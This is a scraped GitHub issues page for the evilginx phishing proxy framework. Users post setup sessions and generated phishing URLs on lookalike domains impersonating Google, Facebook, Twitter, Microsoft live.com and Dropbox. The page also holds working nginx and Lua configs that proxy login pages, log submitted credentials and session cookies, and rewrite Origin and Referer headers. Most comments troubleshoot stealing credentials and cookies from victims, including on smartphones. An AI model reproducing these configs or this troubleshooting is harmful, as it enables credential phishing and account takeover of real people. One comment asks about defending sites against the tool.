kgretzky / evilginx Goto Github PK
View Code? Open in Web Editor NEWPLEASE USE NEW VERSION: https://github.com/kgretzky/evilginx2
License: MIT License
PLEASE USE NEW VERSION: https://github.com/kgretzky/evilginx2
License: MIT License
i am noob so please help me learn
i enabled google with domain yourjjjgoogle.com
and the generated url for youtube.com
here is what i did on terminal after installing evilginx
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v.1.1.0
usage: evilginx.py [-h] {setup,parse,genurl} ...
evilginx.py: error: too few arguments
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py-h
python: can't open file 'evilginx.py-h': [Errno 2] No such file or directory
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py -h
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v.1.1.0
usage: evilginx.py [-h] {setup,parse,genurl} ...
positional arguments:
{setup,parse,genurl}
setup Configure Evilginx.
parse Parse log file(s).
genurl Generate phishing URL.
optional arguments:
-h, --help show this help message and exit
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py setup
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v.1.1.0
usage: evilginx.py setup [-h] [-d DOMAIN] [--crt CRT] [--key KEY]
[--use_letsencrypt] [-y]
(-l | --enable ENABLE | --disable DISABLE)
evilginx.py setup: error: one of the arguments -l/--list --enable --disable is required
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py setup -d google
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v.1.1.0
usage: evilginx.py setup [-h] [-d DOMAIN] [--crt CRT] [--key KEY]
[--use_letsencrypt] [-y]
(-l | --enable ENABLE | --disable DISABLE)
evilginx.py setup: error: one of the arguments -l/--list --enable --disable is required
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py setup --enable google -d yourgoogle.com
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v.1.1.0
[*] Using domain: yourgoogle.com
[*] Stopping nginx daemon...
[+] Site 'google' enabled.
[?] Do you want to automatically parse all logs every minute? [y/N] y
[+] Logs will be parsed every minute via /etc/crontab.
[?] Do you want to install LetsEncrypt SSL/TLS certificates now? [Y/n] Y
[*] Getting SSL/TLS certificates for following domains:
- yourgoogle.com
- accounts.yourgoogle.com
- ssl.yourgoogle.com
Bootstrapping dependencies for Debian-based OSes... (you can skip this with --no-bootstrap)
Ign http://extras.ubuntu.com trusty InRelease
Hit http://security.ubuntu.com trusty-security InRelease
Ign http://in.archive.ubuntu.com trusty InRelease
Hit http://security.ubuntu.com trusty-security/main Sources
Hit http://extras.ubuntu.com trusty Release.gpg
Hit http://in.archive.ubuntu.com trusty-updates InRelease
Hit http://in.archive.ubuntu.com trusty-backports InRelease
Hit http://security.ubuntu.com trusty-security/restricted Sources
Hit http://extras.ubuntu.com trusty Release
Hit http://in.archive.ubuntu.com trusty Release.gpg
Hit http://security.ubuntu.com trusty-security/universe Sources
Hit http://extras.ubuntu.com trusty/main Sources
Hit http://in.archive.ubuntu.com trusty-updates/main Sources
Hit http://security.ubuntu.com trusty-security/multiverse Sources
Hit http://extras.ubuntu.com trusty/main amd64 Packages
Hit http://in.archive.ubuntu.com trusty-updates/restricted Sources
Hit http://security.ubuntu.com trusty-security/main amd64 Packages
Hit http://extras.ubuntu.com trusty/main i386 Packages
Hit http://in.archive.ubuntu.com trusty-updates/universe Sources
Hit http://security.ubuntu.com trusty-security/restricted amd64 Packages
Hit http://security.ubuntu.com trusty-security/universe amd64 Packages
Hit http://in.archive.ubuntu.com trusty-updates/multiverse Sources
Hit http://security.ubuntu.com trusty-security/multiverse amd64 Packages
Hit http://in.archive.ubuntu.com trusty-updates/main amd64 Packages
Hit http://in.archive.ubuntu.com trusty-updates/restricted amd64 Packages
Hit http://security.ubuntu.com trusty-security/main i386 Packages
Hit http://security.ubuntu.com trusty-security/restricted i386 Packages
Hit http://in.archive.ubuntu.com trusty-updates/universe amd64 Packages
Hit http://security.ubuntu.com trusty-security/universe i386 Packages
Hit http://security.ubuntu.com trusty-security/multiverse i386 Packages
Hit http://in.archive.ubuntu.com trusty-updates/multiverse amd64 Packages
Hit http://security.ubuntu.com trusty-security/main Translation-en
Hit http://in.archive.ubuntu.com trusty-updates/main i386 Packages
Hit http://security.ubuntu.com trusty-security/multiverse Translation-en
Ign http://extras.ubuntu.com trusty/main Translation-en_IN
Hit http://in.archive.ubuntu.com trusty-updates/restricted i386 Packages
Hit http://security.ubuntu.com trusty-security/restricted Translation-en
Ign http://extras.ubuntu.com trusty/main Translation-en
Hit http://security.ubuntu.com trusty-security/universe Translation-en
Hit http://in.archive.ubuntu.com trusty-updates/universe i386 Packages
Hit http://in.archive.ubuntu.com trusty-updates/multiverse i386 Packages
Hit http://in.archive.ubuntu.com trusty-updates/main Translation-en
Hit http://in.archive.ubuntu.com trusty-updates/multiverse Translation-en
Hit http://in.archive.ubuntu.com trusty-updates/restricted Translation-en
Hit http://in.archive.ubuntu.com trusty-updates/universe Translation-en
Hit http://in.archive.ubuntu.com trusty-backports/main Sources
Hit http://in.archive.ubuntu.com trusty-backports/restricted Sources
Hit http://in.archive.ubuntu.com trusty-backports/universe Sources
Hit http://in.archive.ubuntu.com trusty-backports/multiverse Sources
Hit http://in.archive.ubuntu.com trusty-backports/main amd64 Packages
Hit http://in.archive.ubuntu.com trusty-backports/restricted amd64 Packages
Hit http://in.archive.ubuntu.com trusty-backports/universe amd64 Packages
Hit http://in.archive.ubuntu.com trusty-backports/multiverse amd64 Packages
Hit http://in.archive.ubuntu.com trusty-backports/main i386 Packages
Hit http://in.archive.ubuntu.com trusty-backports/restricted i386 Packages
Hit http://in.archive.ubuntu.com trusty-backports/universe i386 Packages
Hit http://in.archive.ubuntu.com trusty-backports/multiverse i386 Packages
Hit http://in.archive.ubuntu.com trusty-backports/main Translation-en
Hit http://in.archive.ubuntu.com trusty-backports/multiverse Translation-en
Hit http://in.archive.ubuntu.com trusty-backports/restricted Translation-en
Hit http://in.archive.ubuntu.com trusty-backports/universe Translation-en
Hit http://in.archive.ubuntu.com trusty Release
Hit http://in.archive.ubuntu.com trusty/main Sources
Hit http://in.archive.ubuntu.com trusty/restricted Sources
Hit http://in.archive.ubuntu.com trusty/universe Sources
Hit http://in.archive.ubuntu.com trusty/multiverse Sources
Hit http://in.archive.ubuntu.com trusty/main amd64 Packages
Hit http://in.archive.ubuntu.com trusty/restricted amd64 Packages
Hit http://in.archive.ubuntu.com trusty/universe amd64 Packages
Hit http://in.archive.ubuntu.com trusty/multiverse amd64 Packages
Hit http://in.archive.ubuntu.com trusty/main i386 Packages
Hit http://in.archive.ubuntu.com trusty/restricted i386 Packages
Hit http://in.archive.ubuntu.com trusty/universe i386 Packages
Hit http://in.archive.ubuntu.com trusty/multiverse i386 Packages
Hit http://in.archive.ubuntu.com trusty/main Translation-en
Hit http://in.archive.ubuntu.com trusty/multiverse Translation-en
Hit http://in.archive.ubuntu.com trusty/restricted Translation-en
Hit http://in.archive.ubuntu.com trusty/universe Translation-en
Ign http://in.archive.ubuntu.com trusty/main Translation-en_IN
Ign http://in.archive.ubuntu.com trusty/multiverse Translation-en_IN
Ign http://in.archive.ubuntu.com trusty/restricted Translation-en_IN
Ign http://in.archive.ubuntu.com trusty/universe Translation-en_IN
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
gcc is already the newest version.
python is already the newest version.
python-dev is already the newest version.
augeas-lenses is already the newest version.
ca-certificates is already the newest version.
libaugeas0 is already the newest version.
libffi-dev is already the newest version.
libssl-dev is already the newest version.
openssl is already the newest version.
python-virtualenv is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 738 not upgraded.
Creating virtual environment...
Installing Python packages...
Installation succeeded.
Saving debug log to /var/log/letsencrypt/letsencrypt.log
Plugins selected: Authenticator standalone, Installer None
Registering without email!
Obtaining a new certificate
Performing the following challenges:
http-01 challenge for yourgoogle.com
http-01 challenge for accounts.yourgoogle.com
http-01 challenge for ssl.yourgoogle.com
Cleaning up challenges
Problem binding to port 80: Could not bind to IPv4 or IPv6.
IMPORTANT NOTES:
- Your account credentials have been saved in your Certbot
configuration directory at /etc/letsencrypt. You should make a
secure backup of this folder now. This configuration directory will
also contain certificates and private keys obtained by Certbot so
making regular backups of this folder is ideal.
[-] Failed to obtain certificates.
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] y
[+] Setting all SSL/TLS certificates to be auto-renewed via /etc/crontab.
[*] Starting nginx daemon...
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py genurl -s google -r https://youtube.com
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v.1.1.0
Generated following phishing URLs:
: https://accounts.yourgoogle.com/ServiceLogin?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ
: https://accounts.yourgoogle.com/signin/v2/identifier?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py setup --enable google -d yourjjjgoogle.com
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v.1.1.0
[*] Using domain: yourjjjgoogle.com
[*] Stopping nginx daemon...
[+] Site 'google' enabled.
[?] Do you want to automatically parse all logs every minute? [y/N] N
[?] Do you want to install LetsEncrypt SSL/TLS certificates now? [Y/n] N
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] N
[*] Starting nginx daemon...
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py genurl -s google -r https://youtube.com
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v.1.1.0
Generated following phishing URLs:
: https://accounts.yourjjjgoogle.com/ServiceLogin?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ
: https://accounts.yourjjjgoogle.com/signin/v2/identifier?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ
root@pulkitserver:/home/pulkit/Desktop/evilginx#
Hi @kgretzky
Great project!
Quick question: Won't this trigger Google chromes phishing detection if opened with Chrome (with usage statistics, etc, enabled)?
i've got everything up and running but when creds are entered in to site it does not redirect to the rc.
the browser just keeps waiting for response from server
Please can you explain to me why I keep getting this error when I run ./install.sh on terminal and how can I fix it?
/configure: error: the HTTP gzip module requires the zlib library.
You can either disable the module by using --without-http_gzip_module
option, or install the zlib library into the system, or build the zlib library
statically from the source with nginx by using --with-zlib= option.
ERROR: failed to run command: sh ./configure --prefix=/etc/nginx/nginx ...
[-] Failed to configure openresty installation.
I will really appreciate your quick response. Thanks in anticipation.
my mistake, I have set autoparse all log when setup,
Strange thing has happened to me - google works fine, but facebok opens up as if i was using my phone, i mean the site design is not for dekstops. sometimes even the links says m.facebook.com not facebook.com. how could i fix this?
hello, thank you for really helpful update. there is a problem with login.live.com. i tried many things but as you can see we have some problems in headers that proxy send to live.com.
this is what proxy sends:
OPTIONS https://login.live.com/GetCredentialType.srf?vv=1600&mkt=EN-US&lc=1033 HTTP/1.1 Host: login.live.com Connection: keep-alive Access-Control-Request-Method: POST Origin: http://login.fakelive.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Access-Control-Request-Headers: content-type, hpgact, hpgid Accept: */* Referer: http://login.fakelive.com/ Accept-Encoding: gzip, deflate, sdch, br Accept-Language: en-US,en;q=0.8
and this is what live.com send itself:
POST https://login.live.com/GetCredentialType.srf?vv=1600&mkt=EN-US&lc=1033 HTTP/1.1 Host: login.live.com Connection: keep-alive Content-Length: 130 hpgid: 0 Accept: application/json Origin: https://login.live.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 hpgact: 0 Content-type: application/json; charset=UTF-8 Referer: https://login.live.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.8 Cookie: uaid=***; MSPRequ=lt=***&co=1&id=N; MSPOK=***; CkTst=***
{"username":"@outlook.com","uaid":"","isOtherIdpSupported":false,"checkPhones":true}
there is some problems like request send as a options not a post. also some headers and body are missing. do you have any idea?
thanks a lot
[/etc/systemd/system/nginx.service:16] Missing
When trying to enable and start the nginx service , getting above error.
Great work on the automation! Could you add some flags to link to certificates we already have? I'd like to be able to spin everything up without using certbot and without modifying the config files manually.
when i want to install the script
these Problem occur :
This script only supports Ubuntu/Debian.
it doesnt support all Debian
👍
Hello and thx for this works,
so im sorry for my english .
how to add a new website in the folder ?
What are the important elements to put to create kinds of templates?
Thx .
Masto.
Hi there,
Awesome project you got going on here!
I've been trying to setup a config for Twitter and I'm having a little trouble. I wanted to start small so right now the focus is to just capture the username and password in the POST request. Thus I've stripped anything I believe to be cookie / ssl related.
My config at the moment is this.
log_format twitter_phish '{"remote_addr":"$remote_addr","time":"$time_local","host":"$http_host","request":"$request","status":"$status","referer":"$http_referer","ua":"$http_user_agent","conn":"$connection","body":"$request_body"}';
location / {
proxy_pass https://twitter.com/;
proxy_cookie_domain twitter.com 192.168.60.133;
proxy_redirect https://twitter.com/ 192.168.60.133/;
sub_filter 'https://twitter.com/' '192.168.60.133/';
sub_filter_once off;
sub_filter_types *;
proxy_set_header Accept-Encoding "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
access_log /var/log/evilginx-twitter.log twitter_phish;
}
As you've probably noticed, I don't have a domain setup yet so I'm using a VM's IP to substitute.
I can successfully proxy Twitter. The error happens after I try to login. A request is sent to https://twitter.com/sessions to validate the form data and in /var/log/evilginx-twitter.log I can see the credentials. https://twitter.com/sessions is supposed to redirect me to twitter.com after validation but I get a proxied 404 error. My browser tried to make a request to 192.168.60.133/192.168.60.133/sessions and that is what I see in my address bar.
I think I might be using the sub_filter directive incorrectly or perhaps I'm not understanding the proxy. Would I need another config to handle requests/redirects to https://twitter.com/sessions or I not doing something right?
Regards
Hello!
Thank you for the amazing tool you are sharing with the world for free, you are doing an amazing job!
The only problem is, there are no tutorials / guides at ALL on how to use the tool. If you do not have coding knowledge, it will be almost impossible to use. There is a short documentation on how to install it, but no documentation for example; TOR browser support, .onion sites support. How to configure it, how to build a new config, etc. Please take this in consideration, a lot of people cannot really use it because of leak of knowledge.
Thank you.
Installing Evilginx daemon...
Synchronizing state of nginx.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable nginx
Job for nginx.service failed because the control process exited with error code.
See "systemctl status nginx.service" and "journalctl -xe" for details.
[-] Failed to start Nginx daemon.
systemctl status nginx.service
● nginx.service - The NGINX HTTP and reverse proxy server
Loaded: loaded (/etc/systemd/system/nginx.service; enabled; vendor preset: disabled)
Active: failed (Result: exit-code) since Thu 2017-10-12 15:54:09 EDT; 34s ago
CPU: 3ms
Oct 12 15:54:09 aidan-laptop systemd[1]: Starting The NGINX HTTP and reverse proxy server...
Oct 12 15:54:09 aidan-laptop nginx[22458]: nginx: [emerg] dlopen() "/etc/nginx/nginx/modules/ngx_http_au
Oct 12 15:54:09 aidan-laptop nginx[22458]: nginx: configuration file /etc/nginx/nginx.conf test failed
Oct 12 15:54:09 aidan-laptop systemd[1]: nginx.service: Control process exited, code=exited status=1
Oct 12 15:54:09 aidan-laptop systemd[1]: Failed to start The NGINX HTTP and reverse proxy server.
Oct 12 15:54:09 aidan-laptop systemd[1]: nginx.service: Unit entered failed state.
Oct 12 15:54:09 aidan-laptop systemd[1]: nginx.service: Failed with result 'exit-code'.
Help please, running using Kali GNU/Linux Rolloing
I get this error while compiling with the latest version of OpenSSL
src/event/ngx_event_openssl.c: In function ‘ngx_ssl_connection_error’: src/event/ngx_event_openssl.c:2048:21: error: ‘SSL_R_NO_CIPHERS_PASSED’ undeclared (first use in this function) || n == SSL_R_NO_CIPHERS_PASSED /* 182 */ ^~~~~~~~~~~~~~~~~~~~~~~ src/event/ngx_event_openssl.c:2048:21: note: each undeclared identifier is reported only once for each function it appears in objs/Makefile:1092: recipe for target 'objs/src/event/ngx_event_openssl.o' failed make[2]: *** [objs/src/event/ngx_event_openssl.o] Error 1
Version of OpenSSL:
Package: libssl-dev
Source: openssl
Version: 1.1.0e-1
Is there anyway I can compile using the older version which is supported?
How to do it without reinstall all
connection refused obtaining ssl certificates:PLEASE HELP!!
root@kali:~/Desktop/tools/evilginx# python evilginx.py setup --enable google -d authconfig-gogle.site
_ _ _
() | ()
_____ | | __ _ _ _ __ __ __
/ _ \ \ / / | |/ ` | | ' \ / /
| __/\ V /| | | (| | | | | |> <
_| _/ |||_, ||| |//_
/ |
by @Mrgretzky |/ v.1.1.0
[] Using domain: authconfig-gogle.site
[] Stopping nginx daemon...
[+] Site 'google' enabled.
[?] Do you want to automatically parse all logs every minute? [y/N] y
[+] Logs will be parsed every minute via /etc/crontab.
[?] Do you want to install LetsEncrypt SSL/TLS certificates now? [Y/n] y
[*] Getting SSL/TLS certificates for following domains:
IMPORTANT NOTES:
The following errors were reported by the server:
Domain: accounts.authconfig-gogle.site
Type: connection
Detail: Connection refused
Domain: ssl.authconfig-gogle.site
Type: connection
Detail: Connection refused
Domain: authconfig-gogle.site
Type: connection
Detail: Connection refused
To fix these errors, please make sure that your domain name was
entered correctly and the DNS A/AAAA record(s) for that domain
contain(s) the right IP address. Additionally, please check that
your computer has a publicly routable IP address and that no
firewalls are preventing the server from communicating with the
client. If you're using the webroot plugin, you should also verify
that you are serving files from the webroot path you provided.
[-] Failed to obtain certificates.
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] n
[*] Starting nginx daemon...
Hello - If I get around to it this will be a Pull request and not an issue.
When you check for special characters in the domain name, you use:
" for c in phish_host:
if not c.isalpha():
phish_hostname_esc += '%'
phish_hostname_esc += c
phish_hostnames_esc.append(phish_hostname_esc)"
You must change the isalpha():" to "isalnum()" to include numbers, otherwise the domain name will have escape characters inserted in front of every number.
Hi there, juz wanted to share my way of trying to install evilginx on Kali Linux. What have I overcome and with what I'am still having problems with.
Issues:
Oct 15 12:31:22 kali systemd[1]: Starting The NGINX HTTP and reverse proxy server...
Oct 15 12:31:22 kali nginx[25771]: nginx: [emerg] module "/etc/nginx/nginx/modules/ngx_http_auth_pam_module.so" version 1013005 instead of 1011002 in /etc/nginx/modules-enabled/50-mod-http-auth-pam.conf:1
Oct 15 12:31:22 kali nginx[25771]: nginx: configuration file /etc/nginx/nginx.conf test failed
Oct 15 12:31:22 kali systemd[1]: nginx.service: Control process exited, code=exited status=1
Oct 15 12:31:22 kali systemd[1]: Failed to start The NGINX HTTP and reverse proxy server.
Oct 15 12:31:22 kali systemd[1]: nginx.service: Unit entered failed state.
Oct 15 12:31:22 kali systemd[1]: nginx.service: Failed with result 'exit-code'.
`
solution: At first I just searched for missing modules and made symbolic links to where nginx was looking for them but as You can see that didn't solve the problem as after links were created modules version issue occured :/ Tried to check nginx.conf for any suggestions of module versions validation and how to disable it but failed. Any suggestions? (Sorry for mistakes, this is my first post)
Hey @kgretzky, I would like to feature Evilginx on Null Byte, I could use your help resolving this issue. I'm getting a ""server_name" is not terminated by ";"" error even though there are semicolon's at the ends of each directive. No errors when using the install.sh
script.
VPS specs:
$ lsb_release -a
Distributor ID: Debian
Description: Debian GNU/Linux 9.3 (stretch)
Release: 9.3
Codename: stretch
$ uname -a
Linux hostname 4.9.0-5-amd64 #1 SMP Debian 4.9.65-3+deb9u2 (2018-01-04) x86_64 GNU/Linux
Using the following evilginx command:
$ ./evilginx.py setup --enable facebook -d mywebsite.com
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v.1.1.0
[*] Using domain: mywebsite.com
[*] Stopping nginx daemon...
[+] Site 'facebook' enabled.
[?] Do you want to automatically parse all logs every minute? [y/N] n
[?] Do you want to install LetsEncrypt SSL/TLS certificates now? [Y/n] y
[*] Getting SSL/TLS certificates for following domains:
- mywebsite.com
- www.mywebsite.com
- m.mywebsite.com
Saving debug log to /var/log/letsencrypt/letsencrypt.log
Plugins selected: Authenticator standalone, Installer None
Cert not yet due for renewal
You have an existing certificate that has exactly the same domains or certificate name you requested and isn't close to expiry.
(ref: /etc/letsencrypt/renewal/mywebsite.com.conf)
What would you like to do?
-------------------------------------------------------------------------------
1: Keep the existing certificate for now
2: Renew & replace the cert (limit ~5 per 7 days)
-------------------------------------------------------------------------------
Select the appropriate number [1-2] then [enter] (press 'c' to cancel): 1
Keeping the existing certificate
-------------------------------------------------------------------------------
Certificate not yet due for renewal; no action taken.
-------------------------------------------------------------------------------
[+] Certificates obtained successfully.
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] n
[*] Starting nginx daemon...
There are no other server
blocks in my nginx.conf:
http {
include /root/evilginx/sites/facebook/*.conf;
....
Errors when starting nginx:
-- Unit nginx.service has begun starting up.
---- hostname nginx[6879]: nginx: [emerg] directive "server_name" is not terminated by ";" in /root/evilginx/sites/facebook/m.facebook.com.conf:7
---- hostname nginx[6879]: nginx: configuration file /etc/nginx/nginx.conf test failed
---- hostname systemd[1]: nginx.service: Control process exited, code=exited status=1
---- hostname systemd[1]: Failed to start The NGINX HTTP and reverse proxy server.
-- Subject: Unit nginx.service has failed
The evilginx/sites/m.facebook.com.conf:
server {
listen 80;
listen 443 ssl;
server_name {{PHISH_HOSTNAME[1]}}; # line 7, server_name terminated by ;
ssl_certificate {{CERT_PUBLIC_PATH}};
ssl_certificate_key {{CERT_PRIVATE_PATH}};
....
If I manually replace "{{PHISH_HOSTNAME[1]}}" with "mywebsite.com", I'll instead receive a "not terminated by ;" error for the following ssl_certificate* directives. If I delete the mobile conf and try the www conf only, Nginx complains the "{{PHISH_HOSTNAME[0]}}" line wasn't terminated properly. Any idea why this might be happening?
Having an issue generating the LetsEncrypt SSL cert. I'm sure my A Record is configured correctly.
./evilginx.py setup --enable facebook -d my_website.com
IMPORTANT NOTES:
- The following errors were reported by the server:
Domain: my_website.com
Type: unauthorized
Detail: Invalid response from
http://my_website.com/.well-known/acme-challenge/IEf-BPDxSuxxxxxxxxxxxxxxxxxxxxx6gWIWrzrU
[xxx.xxx.xx.xxx]: 404
To fix these errors, please make sure that your domain name was
entered correctly and the DNS A/AAAA record(s) for that domain
contain(s) the right IP address.
- The following errors were reported by the server:
Domain: www.my_website.com
Type: connection
Detail: Fetching
http://www.my_website.com/.well-known/acme-challenge/2dw-LgiFxxxxxxxxxxxxxxxxxxxxIYP-xnCrHw:
Error getting validation data
Domain: m.my_website.com
Type: connection
Detail: DNS problem: NXDOMAIN looking up A for m.my_website.com
To fix these errors, please make sure that your domain name was
entered correctly and the DNS A/AAAA record(s) for that domain
contain(s) the right IP address. Additionally, please check that
your computer has a publicly routable IP address and that no
firewalls are preventing the server from communicating with the
client. If you're using the webroot plugin, you should also verify
that you are serving files from the webroot path you provided.
[-] Failed to obtain certificates.
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] n
[*] Starting nginx daemon...
When cloning the evilginx repo, should I clone it to the /var/www/
or /etc/nginx/
directory?
i fallow all the necessary steps but at the point when i tray to enable nginx i get this -
systemctl enable nginx
-bash: syntax error near unexpected token `('
root@googlegoogIe:~# systemctl enable nginx
Failed to execute operation: Bad message
systemctl start nginx
Failed to start nginx.service: Unit nginx.service failed to load: Bad message. See system logs and 'systemctl status nginx.service' for details.
● nginx.service - The NGINX HTTP and reverse proxy server
Loaded: error (Reason: Bad message)
Active: inactive (dead)
How to fid thix?
Hello @kgretzky, first of all I want to thank you, this tool is really awesome very useful for pentest engagements.
I was testing the google template, and the cookies and credentials are stolen and work like a charm. However, I noticed that the victim is not being logged in after entering the credentials. I mean, Is being redirected to myaccounts page but is not authenticated.
I tried to troubleshoot and all the cookies seems to be OK. However the last request after authentication is performed (after sending credentials and before being redirected to myaccount.google.com), is not sending the corresponding cookies. I'm suspecting that maybe that's the reason why the victim is not being authenticated.
Is it possible that google have changed something and that's why is not working? Could you give a hand with this?
Thanks man, I would really appreciate your help.
Hi there,
I'm usign your awesome tool to create a dropbox-like site. I setup the site and generate a URL, I navigate to the URL, logon, and get redirected(using Edge browser) to the site I specified(all cool so far).
When I try to parse the logs, I get this:
Parsing logs for site 'dropbox'...
[*] Debug mode on. Log was not truncated!
[+] Found creds: 0
[+] Found tokens: 0
In /var/log/ evilginx-dropbox.log is empty.
But if I go to /evilginx/logs/dropbox I can see the file created, 20170612_091301_0_tokens.txt, and the password is actually there.
Just tried with Facebook, with same results.
i setup evilginx smoothly. i have nginx server actively running. i was testin it on my remote desktop server.but when i run the setup of the weblink eg google and genurl it generates the url. when i click it shows empty page not found. i use vps with my native ip of the vps.for testing , when open link on my local vmware , it shows empty errror page
@kgretzky thanks for your amazing works!
I have many websites, in many technologies... I need a way to protect them.
I'm wondering if there is just something like a check of suspicious IP activities in the aftermath?
Just this? Really?
Can I check my SSL certificate? HSTS? Avoid serving my site if called from evilnginx?
CSRF protection helps in any way?
cookies are not captured from smartphones.
the rt cookie is for only web browsers.
is there is any way to get cookies from smartphone devices too ?
On My PC it works seamlessly, but on my iphone, it is in a loading loop after entering the Username and hitting Next.
First I'll say, great job on this, everything worked out of the box with basically no snags, very cool.
However I'm have a lot of trouble getting things working for a custom target. The target page is getting served when I visit the phishing domain like it should, but any CSS or JS files are not, for some reason the same login page is being served for each js or css file.
Here are my config and site.conf file
config
[site]
name=site
site_conf=["site.com.conf"]
creds_conf=site.creds
phish_subdomains=["www1"]
phish_paths=["/blah/blah/login"]
target_hosts=["www1.site.com/cgi-bin/dir/script?PF=IT&REQ=ClientSignin&LANGUAGE=ENGLISH"]
cookie_hosts=["site.com"]
redir_arg=rc
success_arg=rd
log_name=evilginx-site.log
cert_subdomains=["www1"]
site.conf
log_format site_phish '{"remote_addr":"$remote_addr","time":"$time_local","host":"$http_host","request":"$request","status":"$status","referer":"$http_referer","ua":"$http_user_agent","conn":"$connection","cookies":"$http_cookie","set-cookies":"$set_cookies_all","body":"$request_body"}';
server {
listen 80;
listen 443 ssl;
server_name {{PHISH_HOSTNAME[0]}};
ssl_certificate {{CERT_PUBLIC_PATH}};
ssl_certificate_key {{CERT_PRIVATE_PATH}};
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_prefer_server_ciphers on;
ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';
if ($scheme = http) {
return 301 https://$server_name$request_uri;
}
location / {
proxy_pass https://{{TARGET_HOST[0]}};
proxy_cookie_domain {{COOKIE_HOST[0]}} {{PHISH_DOMAIN}};
proxy_cookie_domain .www1.{{COOKIE_HOST[0]}} .www1.{{PHISH_DOMAIN}};
proxy_redirect https://{{TARGET_HOST[0]}}/ https://{{PHISH_HOSTNAME[0]}}/;
sub_filter 'action="https://{{TARGET_HOST[0]}}' 'action="https://{{PHISH_HOSTNAME[0]}}';
sub_filter 'href="https://{{TARGET_HOST[0]}}' 'href="https://{{PHISH_HOSTNAME[0]}}';
sub_filter '//{{TARGET_HOST[0]}}' '//{{PHISH_HOSTNAME[0]}}';
sub_filter_once off;
set $auth_token "tokenid";
proxy_set_header Accept-Encoding "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
set_unescape_uri $redir $arg_{{REDIR_ARG}};
set $set_cookies_all "";
access_log /var/log/{{LOG_NAME}} site_phish;
access_by_lua_block {
if ngx.var.http_origin ~= nil then
val = string.gsub(ngx.var.http_origin, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
ngx.req.set_header("Origin", val)
end
if ngx.var.http_referer ~= nil then
val = string.gsub(ngx.var.http_referer, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
ngx.req.set_header("Referer", val)
end
if ngx.var.http_cookie ~= nil then
local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)")
